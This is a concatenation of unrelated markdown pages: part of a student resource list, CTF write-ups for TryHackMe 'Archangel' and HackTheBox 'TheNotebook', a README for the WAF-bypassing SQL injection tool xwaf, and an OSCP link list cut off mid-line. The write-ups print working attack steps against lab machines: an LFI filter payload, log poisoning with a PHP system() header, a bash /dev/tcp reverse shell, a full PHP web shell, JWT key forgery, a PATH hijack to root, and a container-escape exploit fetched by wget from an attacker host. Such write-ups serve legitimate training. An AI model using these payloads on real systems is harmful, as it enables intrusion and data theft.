Internship](https://www.insidesherpa.com/virtual-internships/theme/m7W4GMqeT3bh9Nb2c/KPMG-Data-Analytics-Virtual-Internship) - learn data science from a Big 4 accounting firm and how it's used in industry. ### Artificial Intelligence * [Siraj Raval](https://www.youtube.com/channel/UCWN3xxRkmTPmbKwht9FuE5A) - Youtube channel with tutorials about AI. * [Sentdex](https://www.youtube.com/user/sentdex) - Youtube channel with programming tutorials. * [Two Minute Papers](https://www.youtube.com/user/keeroyz) - Learn AI with 5 mins videos. * [Andrej Karpathy](http://karpathy.github.io/) - Old blog about AI, now posting on [Medium](https://medium.com/@karpathy/). * [iamtrask](http://iamtrask.github.io/) - Machine Learning blog. * [colah's blog](http://colah.github.io/) - Blog about neural networks. ### Computer Science * [BaseCS](https://medium.com/basecs) - Explains computer science basics in easy-to-digest articles. Also in [podcast](https://www.codenewbie.org/basecs) format. * [Tutorials Point](http://tutorialspoint.com) - tutorials for technologies like web, mobile and many more. * [Introduction to Computer Science - CS101](https://classroom.udacity.com/courses/cs101/) - introduction to computer science in python language. ### Open Source * [Up For Grabs](http://up-for-grabs.net/#/) - Start exploring open source projects and get involved in them. * [24 Pull Requests](https://24pullrequests.com) - Yearly initiative to encourage developers to send 24 pull requests during December. * [HacktoberFest](https://hacktoberfest.digitalocean.com) - Similar to 24PullRequests, gives swag for 4 accepted pull requests. * [OpenHatch](https://openhatch.org/search/) - Non-profit providing tools for new open source contributors. * [First Timers Only](http://www.firsttimersonly.com) - Beginners-friendly open source projects. * [Your First PR](http://yourfirstpr.github.io/) - Helps you make a contribution by showcasing great starter issues on Github. * [Awesome For Beginners](https://github.com/MunGell/awesome-for-beginners) - A list of awesome beginners-friendly projects. * [CodeTriage](https://www.codetriage.com/) - Pick your favorite projects to recieve a different issue in your inbox every day. * [Open Source Friday](https://opensourcefriday.com/) - Helps you find a project to contribute to. ## Infosec __How to start? - blogs__ * [Beginner Bug Bounty Hunters resources](https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters)- Collection of resources to build up the basics of Web Application Security * [Getting Started in Bug Bounty Hunting](https://whoami.securitybreached.org/2019/06/03/guide-getting-started-in-bug-bounty-hunting/) - What You Should Know Before Starting to learn about Bug Bounty Hunting? * [Getting started in Bug Bounty](https://medium.com/@ehsahil/getting-started-in-bug-bounty-7052da28445a) - How to get started in Bug Bounties * [How to get started with bug Bounty?](https://medium.com/@unknownuser1806/what-i-have-learn-in-my-first-month-of-hacking-and-bug-bounty-dc1a4be58294) - What you need to learn before getting started with bug bounty * [METHODOLOGY , TOOLKIT , TIPS & TRICKS](https://medium.com/bugbountywriteup/bug-bounty-hunting-methodology-toolkit-tips-tricks-blogs-ef6542301c65) - A complete bug bounty blog for beginners __Recon__ * [Recon - by Sahil Ahamad](https://medium.com/@ehsahil/recon-my-way-82b7e5f62e21) - Blog post on reconnaissance processes for web applications security testing * [Recon - by Adrien](https://medium.com/bugbountywriteup/whats-tools-i-use-for-my-recon-during-bugbounty-ec25f7f12e6d) - What tools I use for my recon during Bug Bounty ## MOOCs [Back to Top](#contents) * [Udacity](http://udacity.com) - Free and paid online classes. * [Coursera](http://coursera.org) - Courses from schools and universities like Stanford and Yale. * [Udemy](http://udemy.com) - Online learning and teaching platform. * [edX](https://www.edx.org) - Free online courses from institutions like Harvard, MIT, Microsoft and more. * [Codecademy](https://www.codecademy.com/) - Online learing platform for coding. * [MIT OPENCOURSEWARE](https://ocw.mit.edu/courses/find-by-department/) - Browse and learn with free MIT courses' material. * [Microsoft Virtual Academy](https://mva.microsoft.com) - Free courses on IT basic concepts and Microsoft products and services. * [Awesome Courses](https://github.com/prakhar1989/awesome-courses) - List of awesome university courses for learning Computer Science. * [Lynda](https://www.lynda.com) - Online learing platform. * [Stanford Online](https://online.stanford.edu/courses) - Stanford's courses platform. * [Pluralsight](https://www.pluralsight.com/) - Paid learing platform made to help you build your carreer or land a job. * [Khan Academy](https://www.khanacademy.org/) - Free online learing platform. * [Sololearn](https://www.sololearn.com/) - Learn coding from the ground up for free!! (also availabel on android) * [Y Combinator](https://www.insidesherpa.com/virtual-internships/prototype/oRMogWRHeewqHzA7u/College-students%3A-Learn-how-to-work-at-a-YC-startup-) - Learn how engineering works at a Y Combinator startup ## Fellowships/Scholarships [Back to Top](#contents) * [Developer Scholarship from Google](https://in.udacity.com/google-india-scholarships) - Link for Indian students (Others click [here](https://www.udacity.com/scholarships)). * [Scholarship Opportunities at Google](https://edu.google.com/scholarships/) - Google's scholarship opportunities. * [Microsoft Scholarship Program](https://careers.microsoft.com/students/scholarships) - For students at US/Canada/Mexico only. * [Thiel Fellowship for young innovators](http://thielfellowship.org) - Intended for students under 23yo and offers a total of $100,000 and guidance to drop out of school and pursue other work. * [The Facebook Fellowship Program](https://research.fb.com/programs/fellowship/) - Designed to encourage promising doctoral students who are engaged in areas related to computer science. * [NVIDIA Graduate Fellowships](http://research.nvidia.com/graduate-fellowships) - Fellowship for AI,ML students. * [S.N. Bose Scholars Program](http://iusstf.org/story/53-74-For-Indian-Students.html) - For Indian Students. * [Richard E. Merwin Student Scholarship](https://www.computer.org/web/students/merwin) - For IEEE members. * [The Data Science for Social Good Fellowship](https://dssg.uchicago.edu) - It is a University of Chicago summer program to train aspiring data scientists to work on data mining, machine learning, big data, and data science projects with social impact. * [The Data Incubator](https://www.thedataincubator.com) - The Data Incubator is an 8-week educational fellowship preparing students with Master's degrees and PhDs for careers in big data and data science. * [Kleiner Perkins Fellow - Engineering](http://fellows.kleinerperkins.com) - Kleiner Perkins Fellows program matches accepted fellows up with their partnering Silicon Valley startups over the summer. ## Programming Events [Back to Top](#contents) * [Google Summer of Code](https://summerofcode.withgoogle.com) - A global program focused on bringing more student developers into open source software development. * [Google CodeJam](https://code.google.com/codejam/) - Google’s largest coding competition. * [Google Kickstart](https://code.google.com/codejam/kickstart/) - Many online rounds to give students the opportunity to develop their coding skills and pursue a career at Google. * [Google HashCode](https://hashcode.withgoogle.com) - Programming competition organized by Google for students and industry professionals across Europe, the Middle East and Africa. * [Google Code-in](https://codein.withgoogle.com/) - A competition for pre-university students(13 to 17 years old) to introduce themselves to the world of open source by doing small tasks for various open source projects. * [Facebook HackerCup](https://www.facebook.com/hackercup/) - Annual programming contest organised by Facebook. * [List of Open Source Internship Programs](https://github.com/tapasweni-pathak/SOC-Programs) - Includes [Rails Girls Summer of Code](https://railsgirlssummerofcode.org/) and [Outreachy](https://www.outreachy.org/). * [Hactoberfest](https://hacktoberfest.digitalocean.com) - Organised by Digital Ocean in October. * [IEEEXtreme](https://ieeextreme.org) - Annual 24 hour long team contest for IEEE members. ## Hackathons [Back to Top](#contents) * [Devpost](http://devpost.com/hackathons) - Online or in-person hackathons browsing platform. * [hackathon.io](http://hackathon.io) - Browse in-person hackathons. * [Hackalist](https://www.hackalist.org) - List of upcoming hackathons. * [AngelHack](https://angelhack.com) - Hackathon planning organization. * [Hackevents](https://hackevents.co/hackathons) - Hackathons search engine. * [Yelp Dataset Challenge](https://www.yelp.com/dataset/challenge) - The challenge is a chance for students to conduct research or analysis on our data and share their discoveries with Yelp. * [hack.summit()](https://www.crowdcast.io/hack_summit) - Virtual conference where you can learn from the world's most renowned programmers. ## General Opportunities [Back to Top](#contents) * [Github Student Pack](https://education.github.com/pack) - Get free access to the best developer tools in one place. * [Visual Studio Dev Essentials](https://www.visualstudio.com/dev-essentials/) - Free learning resources and programming tools.
# Archangel CTF [TryHackMe](https://tryhackme.com/room/archangel) ![Logo](./assets/archangel.jpeg) --- ```bash export IP=10.10.62.137 ``` --- ## Index - [Enumeration](#enumeration) - [Gaining access](#getting-access-to-the-machine) - [PrivEsc](#escalating-priviledges) --- ### Enumeration ```bash $ nmap -sC -sV -v $IP -oN nmap/initial.nmap $ nmap -p- $IP -T4 -oN nmap/all_ports.nmap ``` Ports: ``` 22 ssh 80 http ``` Since we have a website we can explore, we can use gobuster to enumerate the pages. ```bash $ gobuster dir -t 64 -u $IP -w ~/wordlists/website_dir/directory-list-2.3-medium.txt -x .txt,.php,.jpg,.png,.html -o gobuster/dir_med.txt ``` Exploring the site, we notice that it has a hostname associated with it `mafialive.thm` which we can append to our `/etc/hosts` and accessing the site again from `mafialive.thm` shows us a development website. Running gobuster _again_ on `mafialive.thm` we discover a `test.php` which appears to be asking for a LFI exploit. ![LFI](./assets/LFI.png) ![test page](./assets/test_php.png) First we try checking `/etc/passwd` which is restricted, however, using php filter with b64, we can bypass this ``` http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php ``` ![test php code](./assets/test_php_code.png) And decrypt this to get the second flag! Now looking at the php source code, we can exploit it by using `..//..` or `.././..` to navigate through the file directories (and cheekily nab the user.txt flag since we know what homes exists from `/etc/passwd`) --- ### Getting access to the machine Now we have to look into getting a reverse shell onto the machine. Now admittedly, I did get stuck here and used the hint, which points to some sort of poisoning. Googling around for hints, I realised it was referring to apache2 log poisioning. First we check we can access the logs from here `http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././../var/log/apache2/access.log` And since we can, we can now execute arbitary commands through it. Enabling us to create a reverse-shell by manipulating our request headers in BurpSuite (or using curl but BurpSuite lets us repeat requests easily in case we make a mistake) Modifying our `User-Agent` to `<?php system($_GET['cmd']); ?>` and adding `&cmd` to our request ~~~ GET /test.php?view=/var/www/html/development_testing/.././.././.././../var/log/apache2/access.log&cmd=whoami ~~~ And when we access the site, we can see appended to the end of our log, the results of our command `www-data` Now we could create a reverse using this but it feels a bit _clunky_, so instead, what'll we'll do is upload a php reverse shell (assuming its a linux machine). Constructing our request Our side: ```bash $ (cd ~/reverse_shells/php; python3 -m http.server 8888) || netcat -lvnp 9999 ``` ~~~ GET /test.php?view=/var/www/html/development_testing/.././.././.././../var/log/apache2/access.log&cmd=wget%20http://<<IP>>:<<port>>/revshell.php HTTP/1.1 Host: mafialive.thm User-Agent: <?php system($_GET['cmd']); ?> ~~~ Now we can access the reverse shell from `http://mafialive.thm/revshell.php` --- ### Escalating Priviledges Now that we have access as `www-data` we can enumerate the system to escalate priviledges. In order to speed this up, I also put linpeas onto the shell and run it. I notice a file running in the crontab, which we could also edit, running by another use `archangel`. Modifying this file to create a new reverse-shell by adding this code: ![cronjob](./assets/cronjob.png) ```bash $ bash -i >& /dev/tcp/IP/8888 0>&1 ``` I noticed other write-ups created an ssh key for ease-of-access but I prefer this since it leaves less of a trace. Now that we have access to more files, I notice a strange `backup` file owned by root but executable by anyone. ![backup](./assets/backup.png) Running strings through the file, we notice something strange: ![relative path](./assets/cp_relative.png) It is `PATH` exploitation time! ```bash $ export PATH="$(pwd):$PATH" ``` And we can create a `cp` file which will give us root access ```bash #!/bin/bash /bin/bash -i ``` Remember to make it executable ```bash $ chmod +x cp $ ./backup ``` ![PATH](./assets/path_exploit.png) And we are _**complete!**_ ![archangel](https://thumbs.dreamstime.com/b/archangel-michael-angel-divine-light-68373659.jpg)
<img src="https://raw.githubusercontent.com/3xp10it/pic/master/xwafWhite.png"> # xwaf <a href="https://github.com/3xp10it/bypass_waf/blob/master/xwaf.py">xwaf</a>是一个python写的waf自动绕过工具,上一个版本是<a href="https://github.com/3xp10it/bypass_waf/blob/master/bypass_waf.py">bypass_waf</a>,xwaf相比bypass_waf更智能,可无人干预,自动暴破waf ### Disclaimer [!] legal disclaimer: Usage of xwaf.py for attacking targets without prior mutual consent is illegal.It is the end user's responsibility to obey all applicable local, state and federal laws.Developers assume no liability and are not responsible for any misuse or damage caused by this program. [!] 法律免责声明:未经事先相互同意,使用本程序攻击目标是非法的。使用本程序的最终用户有责任遵守所有适用的地方、国家法律。开发人员对本程序造成的任何误用、滥用、非法使用不承担任何责任。 ### Requirement ``` python3 pip3 mysql linux(test on ubuntu and kali2.0,others should based on debain) ``` python3安装可参考如下步骤 apt-get install python3 或: wget https://www.python.org/ftp/python/3.5.2/Python-3.5.2.tar.xz tar xJf Python-3.5.2.tar.xz cd Python-3.5.2 ./configure --prefix=/opt/python3 make && make install ln -s /opt/python3/bin/python3.5 /usr/local/bin/python3 pip3安装 apt-get install -y python3-pip 或 https://pip.pypa.io/en/stable/installing ### Usage ``` eg: 1.python3 xwaf.py -u "http://www.baidu.com/1.php?id=1" 2.python3 xwaf.py -u "http://www.baidu.com/1.php" --data="postdata" -p xxx 3.python3 xwaf.py -r /tmp/headerfile -p xxx --risk 3 --level 5 ``` ### Attention ``` 1.xwaf支持除-m/-l外的所有sqlmap参数,用法和sqlmap一样即可,-m/-l为批量功能,暂不支持,如果需要批量,请自行code实现 2.由于xwaf已经有比较好的参数方案,一般情况下尽量少用参数,如果有必须要用的参数除外[如--data/-p/-r等参数] 3.普通get类型注入点,这样用即可: python3 xwaf.py -u "http://www.baidu.com/1.php?id=1&page=2" -p id 4.人工输入的参数的优先级大于xwaf自带的参数方案 5.关于--tamper参数的使用: xwaf的主要功能是排列组合使用所有可能的tamper组合来爆破waf,如果人为使用了--tamper参数,xwaf将在人为设置的已有 tamper基础上再排列组合,eg.人为使用的命令为: python3 xwaf.py -u "http://www.baidu.com/1.php?id=1" --tamper=space2comment 那么xwaf使用的tamper方案中的每个都会有space2comment 6.关于代理的使用: a)xwaf默认不用代理,如果使用代理需要在xwaf运行后选择y|Y b)使用的代理来源于程序自动收集的网上的代理 c)使用代理有防封的优点,但网络连接速度不一定能保证 7.need python3 ``` ### 代码流程图 <img src="https://raw.githubusercontent.com/3xp10it/pic/master/xwaf.png"> ```markdown 以[127.0.0.1/1.php?id=1为例] 1.start 2.检测系统/root/.sqlmap/output/127.0.0.1/log文件是否存在 3.获取log文件: 如果不存在log文件则调用get_log_file_need_tamper函数,执行完这个函数后获得log文件,也即成功检测出目标 url有sqli注入漏洞,如果执行完get_log_file_need_tamper函数没有获得log文件则认为该url没有sqli漏洞 4.获取db_type[数据库类型] 调用get_db_type_need_tamper函数,用于后面的tamper排列组合时,只将目标url对应的数据库类型的tamper用于 该目标在sql注入时tamper的选择后的组合 5.获取sqli_type[注入方法] 调用get_good_sqli_type_need_tamper函数,sql注入方法中一共有U|S|E+B|Q|T 6种注入方法,后3种查询效率低, 首先在log文件中查找是否有U|S|E这3种高效方法中的任意一种,如果有略过这一步,否则执行 get_good_sqli_type_need_tamper函数,执行该函数将尝试获得一种以上的高效注入方法 6.获取current-db[当前数据库名] 如果上面获得了高效注入方法,则先用高效注入方法获得current-db,如果没有则用B|Q|T方法尝试获得 current-db,用来尝试获得current-db的函数是get_db_name_need_tamper 7.获取table[当前数据库的表名] 如果上面获得了高效注入方法,则先用高效注入方法获得table,如果没有则用B|Q|T方法尝试获得table,尝试获得 table的函数是get_table_name_need_tamper 8.获取column[当前数据库的第一个表的所有列名] 如果上面获得了高效注入方法,则先用高效注入方法获得column,如果没有则用B|Q|T方法获得column,尝试获得 column的函数是get_column_name_need_tamper 9.获取entries[column对应的真实数据] 调用get_entries_need_tamper函数,执行完get_entries_need_tamper函数后,waf成功绕过,从上面的步骤一直到 这个步骤,逐步获得最佳绕过waf的脚本组合 ``` ### About ```markdown 1.xwaf支持记忆,运行中断后下次继续运行时会在中断时的最后一个命令附近继续跑,不会重新经历上面的所有函数的处理 2.xwaf支持sqlmap除-m/-l外的所有参数用法 3.各个get_xxx_need_tamper函数的处理采用针对当前url的数据库类型(eg.MySQL)的所有过waf的脚本 (在sqlmap的tamper目录中)的排列组合的结果与--hex或--no-cast选项进行暴力破解如果--hex起作用了则不再使用 --no-cast尝试,--no-cast起作用了也不再用--hex尝试 4.xwaf运行完后将在/root/.sqlmap/output/127.0.0.1目录下的ini文件中看到相关信息,bypassed_command是成功暴破 waf的sqlmap语句 5.在tamper组合中,先用到的tamper会加入到上面的ini文件中,在以后的每个tamper组合中,综合已经得到的有用的 tamper再组合,在上面的ini文件中的tamper_list即为不断完善的tamper组合 6.支持自动更新升级 ``` ### Changelog ``` [2017-12-02] 修复homePath变更带来的bug [2017-09-28] 由原来的`tamper_string = self.get_from_tuple(current_tamper_list.append(tamper_string)) 修改为current_tamper_list.append(tamper_string) tamper_string = self.get_from_tuple(current_tamper_list) [2017-09-05] 修改--level 3为--level 5 [2017-08-30] 修复--suffix " or '1'='1"类型的bug [2017-08-25] 更新添加默认参数--risk 3 [2017-07-05] 通过在发送[设置]self.stop_order=1后睡1s来解决底部打印混乱的问题 [2017-07-05] 更新支持根据github上的sqlmap的tamper的更新情况自动更新tamper[sqlmap] [2017-07-05] 添加支持检测系统有没有将sqlmap添加到path中,如果没有则自动添加 [2017-04-27] 修复复杂参数没有双引号包含的错误 [2017-03-13] 修复要输入bing api key的问题 [2017-02-23] 修复一处usage函数调用失败 [2017-02-21] 修复一处更新版本时的逻辑错误 [2017-02-13] 更新支持代替sqlmap跑普通没有waf的注入点,之前版本要求只能跑有waf的注入点 [2017-02-13] 更新支持自动进行版本升级 [2017-02-12] 更新支持所有sqlmap参数 [2017-01-18] fix line128处的slef改成self,fix line128处的db_name未定义错误 [2016-11-15] 修复一处ACCESS数据库考虑不周全判断和几处good_print函数调用错误 [2016-11-15] 增加支持代理自动切换功能,自选,默认不用代理[用代理速度较慢] [2016-11-02] 增加access数据库特殊性的处理 [2016-11-01] get_db_type_need_tamper之后的数据库类型获取由之前的get_db_type_from_log_file改成 eval(get_key_value_from_config_file(self.log_config_file,'default','db_type')) ```
# The NoteBook @Hackthebox ![image](https://user-images.githubusercontent.com/5285547/127499612-feb4ebdf-63f1-4899-b91f-14c7d161d146.png) Link: https://app.hackthebox.eu/machines/TheNotebook ## Enumeration ### Nmap ``` PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 1234/tcp open hotline 10010/tcp filtered rxapi PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 86:df:10:fd:27:a3:fb:d8:36:a7:ed:90:95:33:f5:bf (RSA) | 256 e7:81:d6:6c:df:ce:b7:30:03:91:5c:b5:13:42:06:44 (ECDSA) |_ 256 c6:06:34:c7:fc:00:c4:62:06:c2:36:0e:ee:5e:bf:6b (ED25519) 80/tcp open http nginx 1.14.0 (Ubuntu) |_http-favicon: Unknown favicon MD5: B2F904D3046B07D05F90FB6131602ED2 | http-methods: |_ Supported Methods: GET OPTIONS HEAD |_http-server-header: nginx/1.14.0 (Ubuntu) |_http-title: The Notebook - Your Note Keeper 1234/tcp open http SimpleHTTPServer 0.6 (Python 3.6.9) | http-methods: |_ Supported Methods: GET HEAD |_http-server-header: SimpleHTTP/0.6 Python/3.6.9 |_http-title: Directory listing for / 10010/tcp filtered rxapi ``` ## Port 80 Let's check out this Note Keeper application from the nmap scan. ![image](https://user-images.githubusercontent.com/5285547/127500008-0f75dbcf-22ac-429d-8fa7-1a0f7a1a892e.png) Looks like a simple enough application, lets Register an account and enter the main app. I choose to register up as admin to see if an account existed first. Details ``` username: admin password: admin email: [email protected] ``` ![image](https://user-images.githubusercontent.com/5285547/127500224-1fd6eed9-16fa-468c-93df-cde6e7e5bd18.png) So I tried the old add a space to the admin name trick, surprisingly this worked. ``` 'admin ' # note the space after admin ``` Now logged in as user "admin " I can access notes and make a new note. ![image](https://user-images.githubusercontent.com/5285547/127500550-21482f2b-035a-49cd-916e-6fd87c9a9e7a.png) ![image](https://user-images.githubusercontent.com/5285547/127500583-09d0c62f-1eda-48ca-b6f6-febffeddd1af.png) I tested for vulnerabilities like xss, ssrf, crsf but didn't found anything. So I opened up Burp suite to check the login and auth responses. There I found what looked like a JWT token. ## Jwt token (RS256) ![image](https://user-images.githubusercontent.com/5285547/127500957-9512cd21-9106-467f-a140-3c4c7aa75235.png) Opening the token in jwt.io I can see the tokens details. ![image](https://user-images.githubusercontent.com/5285547/127507282-88faa774-8e99-4a85-bfaa-1e4816843474.png) Seeing the "privKey.key" and "RS265" I knew this was vunerable as we should be able to use our own certificate to authenticate the jwt token. Info: The algorithm RS256 uses the private key to sign the message and uses the public key for authentication Let's generate a new private.key and use that to sign our jwt token with changed details. Doing so without the signing of the token will invalidate it. - Steps: 1. Generate a new private key ``` openssl genrsa -out example.key 4096 ``` Credits: https://www.freecodecamp.org/news/openssl-command-cheatsheet-b441be1e8c4a/ 2. Start a web server in the directory with the example.key file in. ``` python3 -m http.server 80 ``` 3. Change the values in the token. ``` change the "kid" value to your hosted file change the username to "admin" (without the space now) change the "admin_cap" to 1 Add the example.key to the "private" field on jwt.io ``` ![image](https://user-images.githubusercontent.com/5285547/127506901-2b9fc01a-9856-487a-ad51-1be068ef7152.png) 4. Take the new token and reaplce it for the token on the webpage (cookies) ![image](https://user-images.githubusercontent.com/5285547/127503185-0131b6b5-1410-4f06-8e88-2c6f488fff57.png) Now refresh the page to become the real admin and check out the new notes. ![image](https://user-images.githubusercontent.com/5285547/127507069-16871b30-886d-429f-85c6-f6b095b25412.png) One of the notes suggests that PHP can be executed and now we have access to upload files, let's try for a reverse shell. Upload a basic shell first. shell_web.php ``` <html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?> </pre> </body> <script>document.getElementById("cmd").focus();</script> </html> ``` ![image](https://user-images.githubusercontent.com/5285547/127510079-39ebfe5a-4cac-4a44-bdf4-9ba296077934.png) Uploading this and then viewing the file, we can now execute commands. Then move onto a better shell. ![image](https://user-images.githubusercontent.com/5285547/127510331-a1fa62dc-551b-4f15-b38d-4d6f63e2b8c4.png) ## User Looking around the system, I find a strange backup in the /var/backups folder ``` home.tar.gz ``` I copy it to the /tmp directory and have a look inside to find an ssh key for noah the user on the box. ``` cp /home.tar.gz /tmp cd /tmp gunzip home.tar.gz tar -xvf home.tar cd home/noah/.ssh cat id_rsa ``` Using the id_rsa key we can login as noah ``` nano noah_id_rsa #Paste in the id_rsa you got #close and save file chmod 600 noah_id_rsa ssh -i noah_id_rsa [email protected] ``` ![image](https://user-images.githubusercontent.com/5285547/127514317-703f435b-7c36-4f02-9e83-5af12cab84a8.png) Then go ahead and get the user.txt flag! ## Root Looking at "sudo -l" shows something intresting! ![image](https://user-images.githubusercontent.com/5285547/127515744-fcfcd06d-c6da-4513-b21d-a23349c61d3f.png) Looks like a docker escape or abuse in some way. Time for some research! Docker version ![image](https://user-images.githubusercontent.com/5285547/127520414-391a0880-b237-45a0-8101-a7ed1736253b.png) I looked the version up online and came across this poc for the exploit: https://github.com/Frichetten/CVE-2019-5736-PoC Time to try it out. Setup. Have 2 ssh instances on the target machine for ease ``` wget https://raw.githubusercontent.com/Frichetten/CVE-2019-5736-PoC/master/main.go nano main.go # Change the payload to what you want here. go build main.go python3 -m http.server # host and serve the file to the target box. ``` Change payload: ![image](https://user-images.githubusercontent.com/5285547/127521487-5f6c01ef-3a93-4859-a4b4-3a2d15be3674.png) Now host it then open the container on the attacking box. ``` sudo /usr/bin/docker exec -it webapp-dev01 sh ``` Run the next commands to transfer the exploit to the target and get ready to run the next commands when you see the Success message. In container (attack box) ``` wget http://10.10.14.87:8088/main && chmod +x main ``` On another ssh connection, have this command ready. Plus a nc listner on port 9999 ``` sudo docker exec -it webapp-dev01 /bin/sh ``` Now execute the command below, wait for the success message and then run the command on the other ssh session. Then catch the reverse shell from the cotainer on your machine to get root! ![image](https://user-images.githubusercontent.com/5285547/127523183-07b4c79b-a0f0-4c32-9c8c-85fdd1890616.png) I really enjoyed this box, I hope you did too!!
```bash ████████╗██╗ ██╗███████╗ ██╗ ██╗ ██╗███╗ ██╗██╗ ██╗ ████████╗███████╗ █████╗ ███╗ ███╗ ╚══██╔══╝██║ ██║██╔════╝ ██║ ╚██╗ ██╔╝████╗ ██║╚██╗██╔╝ ╚══██╔══╝██╔════╝██╔══██╗████╗ ████║ ██║ ███████║█████╗ ██║ ╚████╔╝ ██╔██╗ ██║ ╚███╔╝ ██║ █████╗ ███████║██╔████╔██║ ██║ ██╔══██║██╔══╝ ██║ ╚██╔╝ ██║╚██╗██║ ██╔██╗ ██║ ██╔══╝ ██╔══██║██║╚██╔╝██║ ██║ ██║ ██║███████╗ ███████╗██║ ██║ ╚████║██╔╝ ██╗ ██║ ███████╗██║ ██║██║ ╚═╝ ██║ ╚═╝ ╚═╝ ╚═╝╚══════╝ ╚══════╝╚═╝ ╚═╝ ╚═══╝╚═╝ ╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝ ---- lynxes just wanna have fun ---- ``` # OSCP We have created this repo with the aim to gather all the info that we’d found useful and interesting for the OSCP. We have also collected material from other resources (websites, courses, blogs, git repos, books, etc). **YO! YO!**: we are _no more_ working on this repo, even if future updates are not excluded. We hope this could be still useful for future students. As always remember: this is not intended to be a comprehensive repo, cross-reference and information gathering are your friends. ## TOC - [How to navigate the repo](#how-to-navigate-the-repo) - [Official Offensive Security references](#official-offensive-security-references) - [Blog](#blog) - [Reddit](#reddit) - [GitHub repos](#github-repos) - [Webbing](#webbing) - [Genereal useful resources](#genereal-useful-resources) - [Buffer Overflow](#buffer-overflow) - [Active Directory](#active-directory) - [PrivEsc](#privesc) - [Methodologies](#methodologies) - [Automation scripts](#automation-scripts) - [Tools](#tools) - [Cheat sheets](#cheat-sheets-and-wordlists) - [Gamified Learning](#gamified-learning) - [Reporting](#reporting) - [Mental and Physical Health](#mental-and-physical-health) ## How to navigate the repo The repo is structured by this way: ```bash |── Box template ├── Methodologies ├── README.md └── troubleshooting.md ``` * **Box template**: here you can see how we organize our work flow * **Methodologies**: here you can find a checklist for each phase (recon/enum, postexploit, privesc, etc) * **README**: where you can find a list of useful links * **troubleshooting.md**: is a ledger to record all the tecnhical issues:solution we have found along the way _**Be aware**: we use [Obsidian](https://obsidian.md/) as note taking application. This justifies the directory structure and how we format files. We think the graph view provided by Obsidian is a pleasant way to have a visual view of the data we gather. So if you use our checklists, we suggest you run them on Obsidian for a better experience._ ## Official Offensive Security References - [**OSCP Exam Change**](https://www.offensive-security.com/offsec/oscp-exam-structure/) - [Exam Guide](https://help.offensive-security.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide) - [Try Harder: From mantra to mindset](https://www.offensive-security.com/offsec/what-it-means-to-try-harder/) - [Proctored Exam Information](https://help.offensive-security.com/hc/en-us/sections/360008126631) - [Proctoring Tool Student Manual](https://help.offensive-security.com/hc/en-us/articles/360050299352) - [Upload Exam Report](https://upload.offsec.com/) - [Student Forum](https://forums.offensive-security.com/) - [Help Center](https://help.offensive-security.com/hc/en-us/categories/360002666252-General-Frequently-Asked-Questions-FAQ-) ## Blog - [OSCP: wirzka's two cents](https://andreagrigoletto.com/posts/oscp/) - [the-oscp-preperation-guide-2020](https://johnjhacking.com/blog/the-oscp-preperation-guide-2020/) - Luke’s Ultimate OSCP Guide ([Part 1](https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-1-is-oscp-for-you-b57cbcce7440), [Part 2](https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-2-workflow-and-documentation-tips-9dd335204a48), [Part 3](https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-3-practical-hacking-tips-and-tricks-c38486f5fc97)) - [TJNulls' preparation guide for PWK OSCP](https://www.netsecfocus.com/oscp/2019/03/29/The_Journey_to_Try_Harder-_TJNulls_Preparation_Guide_for_PWK_OSCP.html) - [Abatchy: How to prepare for PWK/OSCP, a noob-friendly guide](https://www.abatchy.com/2017/03/how-to-prepare-for-pwkoscp-noob) - [5 Tips for OSCP Prep](https://medium.com/bugbountywriteup/5-tips-for-oscp-prep-76001cdf4f4f) - [BIG resource list](https://backdoorshell.gitbooks.io/oscp-useful-links/content/chapter1.html) - [Tip for succes in PWK OSCP](https://www.mjkranch.com/2019/06/tips-for-success-in-pwk-oscp/) - [My OSCP experience](https://refabr1k.github.io/learning/post-My-OSCP-Experience/) - [Path to OSCP](https://localhost.exposed/path-to-oscp/) - [Offensive Security Certified Professional – Lab and Exam Review](https://theslickgeek.com/oscp/) - [My Fight for the OSCP](https://alphacybersecurity.tech/my-fight-for-the-oscp/) - [Passing the OSCP while working full time](https://medium.com/@galolbardes/passing-the-oscp-while-working-full-time-29cb22d622e0) - [Not your standard OSCP guide](https://blog.thehackingnomad.com/) - [How to pass the OSCP in 30 days.](https://achrafj.medium.com/how-to-pass-the-oscp-in-30-days-dc9207d09f2b) - [Unofficial OSCP Approved Tools](https://falconspy.medium.com/unofficial-oscp-approved-tools-b2b4e889e707) ## Reddit - [First Attempt ... Discouraged](https://www.reddit.com/r/oscp/comments/l7x5gq/first_attempt_discouraged/) - [1 attempt 1 fail with 55 points](https://www.reddit.com/r/oscp/comments/l5sett/1_attempt_1_fail_with_55_points/) - [Failed the OSCP - any tips for the next attempt?](https://www.reddit.com/r/netsecstudents/comments/5fwc1z/failed_the_oscp_any_tips_for_the_next_attempt/danovo5/) - [Tips for passing the exam](https://www.reddit.com/r/oscp/comments/9j6q7d/tips_for_passing_the_exam/) - [1st attempt, 80+ points. My experience and some unpopular opinions inside.](https://www.reddit.com/r/oscp/comments/la1kxe/1st_attempt_80_points_my_experience_and_some/) - [First cert, first try, unconventional approach](https://www.reddit.com/r/oscp/comments/l41dxe/first_cert_first_attempt_an_unconventional/) - [How Offensive Security Saved My Life - An OSCP Journey](https://www.reddit.com/r/oscp/comments/lc3937/how_offensive_security_saved_my_life_an_oscp/) - [Unmotivated in ctfs](https://www.reddit.com/r/oscp/comments/l9dm4z/unmotivated_in_ctfs/) - [Need help to prepare OSCP Checklist](https://www.reddit.com/r/oscp/comments/l95y1z/need_help_to_prepare_oscp_checklist/) - [Preparing for 4th 